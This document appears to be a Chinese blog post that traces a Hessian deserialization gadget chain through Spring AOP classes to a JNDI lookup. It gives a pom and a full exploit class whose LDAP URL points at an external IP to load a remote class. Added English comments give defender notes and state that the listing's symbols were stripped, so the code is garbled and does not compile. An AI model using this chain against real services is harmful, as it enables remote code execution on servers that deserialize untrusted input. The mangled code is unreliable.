前言
简单分析
EXP 前言
前文：【Web】浅聊Java反序列化之Rome——关于其他利用链-CSDN博客
前文里最后给到一条HotSwappableTargetSource利用链，就是我们今天PartiallyComparableAdvisorHolder链子的前半段（触发恶意类的toString方法），故不再赘述。
多嘴提一句，复现的时候记得jdk换成8u100以下的，jdk8高版本不能执行远程文件，打不了JNDI。
简单分析
简单给出前半部分的调用关系：HashMap#put -> HashMap#putVal -> HotSwappableTargetSource#equals -> XString#equals -> AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder#toString -> ...
接下来我们来关注省略号的部分，发现接着调用了PartiallyComparableAdvisorHolder的advisor属性（AspectJPointcutAdvisor）的getOrder方法。跟进，调用this.advice的getOrder方法，这里是AspectJAroundAdvice#getOrder。跟进，this.aspectInstanceFactory为BeanFactoryAspectInstanceFactory，调用BeanFactoryAspectInstanceFactory#getOrder。跟进，this.beanFactory为SimpleJndiBean，调用SimpleJndiBean#getType。
跟进，调用SimpleJndiBean#doGetType。
跟进，name采用的是单例模式，isSingleton为true，进入if判断，调用doGetSingleton。第一次进入的时候singletonObjects是不会有对应的jndi对象的，所以进入else分支，触发lookup，从而完成JNDI注入。
EXP
pom依赖：
<dependencies>
    <dependency>
        <groupId>org.springframework</groupId>
        <artifactId>spring-aop</artifactId>
        <version>5.0.0.RELEASE</version>
    </dependency>
    <dependency>
        <groupId>org.springframework</groupId>
        <artifactId>spring-context</artifactId>
        <version>4.1.3.RELEASE</version>
    </dependency>
    <dependency>
        <groupId>org.aspectj</groupId>
        <artifactId>aspectjweaver</artifactId>
        <version>1.6.10</version>
    </dependency>
    <dependency>
        <groupId>com.caucho</groupId>
        <artifactId>hessian</artifactId>
        <version>4.0.66</version>
    </dependency>
</dependencies>
召唤计算器的神奇咒语
package org.Hessian;import com.caucho.hessian.io.HessianInput;
import com.caucho.hessian.io.HessianOutput;
import com.sun.org.apache.xpath.internal.objects.XString;
import org.apache.commons.logging.impl.NoOpLog;
import org.springframework.aop.aspectj.AbstractAspectJAdvice;
import org.springframework.aop.aspectj.AspectInstanceFactory;
import org.springframework.aop.aspectj.AspectJAroundAdvice;
import org.springframework.aop.aspectj.AspectJPointcutAdvisor;
import org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory;
import org.springframework.aop.target.HotSwappableTargetSource;
import org.springframework.jndi.support.SimpleJndiBeanFactory;
import sun.reflect.ReflectionFactory;import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
/**
 * Proof-of-concept listing from the post: a Hessian deserialization gadget chain whose sink is a
 * JNDI lookup. Call order, as traced in the analysis above: HashMap#putVal ->
 * HotSwappableTargetSource#equals -> XString#equals -> PartiallyComparableAdvisorHolder#toString ->
 * AspectJPointcutAdvisor#getOrder -> AspectJAroundAdvice#getOrder ->
 * BeanFactoryAspectInstanceFactory#getOrder -> SimpleJndiBeanFactory#getType -> doGetType ->
 * doGetSingleton -> lookup.
 *
 * Reflection helpers (no security logic of their own):
 *   setFieldValue(obj, name, value) - getField on obj's class, then Field.set
 *   getField(clazz, name)           - getDeclaredField, retrying on the superclass when missing
 *                                     (NOTE(review): getDeclaredField never returns null, and the
 *                                     catch branch dereferences getSuperclass() without a null check)
 *   createWithoutConstructor(cls)   - createWithConstructor using Object's no-arg constructor
 *   createWithConstructor(...)      - ReflectionFactory.newConstructorForSerialization, so the
 *                                     target class's own constructors never run
 *
 * Defender notes:
 *   - The dangerous step is the JNDI lookup of a name carried inside a deserialized object; any
 *     service that deserializes untrusted Hessian input with these classes on its classpath is
 *     exposed. Do not deserialize untrusted input, and restrict the deserializable classes
 *     (recent Hessian 4.0.x releases provide a class allow/deny list on the SerializerFactory).
 *   - Remote class loading through the LDAP reference requires
 *     com.sun.jndi.ldap.object.trustURLCodebase=true; newer JDK 8 updates default it to false,
 *     which is why the post says the demo needs an older JDK 8.
 *   - Detection: an application JVM opening an outbound LDAP connection to an unexpected host while
 *     handling a request. The host:port in main() is copied verbatim from the post and should be
 *     treated as an indicator, not reused.
 *
 * NOTE: the listing is an extraction artefact: '=', '<', '>' and string quotes were stripped, and
 * the "//" inside the ldap URL turns the rest of that line into a comment, so it is not compilable
 * as shown.
 */
public class EXP {public static void main(String[] args) throws Exception {/* JNDI name the chain ends up looking up; external host taken from the post (IoC, do not reuse) */String jndiUrl ldap://124.222.136.33:1337/#aaa;/* bean factory whose getType() performs the lookup; NoOpLog presumably keeps the logger fields serializable (not stated in the post) */SimpleJndiBeanFactory bf new SimpleJndiBeanFactory();bf.setShareableResources(jndiUrl);setFieldValue(bf, logger, new NoOpLog());setFieldValue(bf.getJndiTemplate(), logger, new NoOpLog());/* advice -> advisor -> holder wrappers whose getOrder()/toString() relay the call to bf.getType() */AspectInstanceFactory aif createWithoutConstructor(BeanFactoryAspectInstanceFactory.class);setFieldValue(aif, beanFactory, bf);setFieldValue(aif, name, jndiUrl);AbstractAspectJAdvice advice createWithoutConstructor(AspectJAroundAdvice.class);setFieldValue(advice, aspectInstanceFactory, aif);AspectJPointcutAdvisor advisor createWithoutConstructor(AspectJPointcutAdvisor.class);setFieldValue(advisor, advice, advice);Class? pcahCl Class.forName(org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder);Object pcah createWithoutConstructor(pcahCl);setFieldValue(pcah, advisor, advisor);/* v1 wraps the holder, v2 wraps an XString; HotSwappableTargetSource#equals compares the two targets, which is where XString#equals calls toString() */HotSwappableTargetSource v1 new HotSwappableTargetSource(pcah);HotSwappableTargetSource v2 new HotSwappableTargetSource(new XString(xxx));/* hand-built HashMap table: both Node entries use hash 0, so rebuilding the map on read forces the equals() comparison */HashMapObject, Object s new HashMap();setFieldValue(s, size, 2);Class? nodeC;try {nodeC Class.forName(java.util.HashMap$Node);}catch ( ClassNotFoundException e ) {nodeC Class.forName(java.util.HashMap$Entry);}Constructor? 
nodeCons nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);nodeCons.setAccessible(true);Object tbl Array.newInstance(nodeC, 2);Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));setFieldValue(s, table, tbl);// serialize (setAllowNonSerializable(true) lets non-Serializable classes through the writer; leave the default alone on real services) ByteArrayOutputStream byteArrayOutputStream new ByteArrayOutputStream();HessianOutput hessianOutput new HessianOutput(byteArrayOutputStream);hessianOutput.getSerializerFactory().setAllowNonSerializable(true);hessianOutput.writeObject(s);hessianOutput.flush();byte[] bytes byteArrayOutputStream.toByteArray();// deserialize (readObject() rebuilds the map and fires the chain) ByteArrayInputStream byteArrayInputStream new ByteArrayInputStream(bytes);HessianInput hessianInput new HessianInput(byteArrayInputStream);hessianInput.readObject();}public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception {final Field field getField(obj.getClass(), fieldName);field.set(obj, value);}public static Field getField ( final Class? clazz, final String fieldName ) throws Exception {try {Field field clazz.getDeclaredField(fieldName);if ( field ! null )field.setAccessible(true);else if ( clazz.getSuperclass() ! null )field getField(clazz.getSuperclass(), fieldName);return field;}catch ( NoSuchFieldException e ) {if ( !clazz.getSuperclass().equals(Object.class) ) {return getField(clazz.getSuperclass(), fieldName);}throw e;}}public static T T createWithoutConstructor ( ClassT classToInstantiate ) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);}public static T T createWithConstructor ( ClassT classToInstantiate, Class? super T constructorClass, Class?[] consArgTypes, Object[] consArgs ) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {Constructor? 
super T objCons constructorClass.getDeclaredConstructor(consArgTypes);objCons.setAccessible(true);Constructor? sc ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);sc.setAccessible(true);return (T) sc.newInstance(consArgs);}
}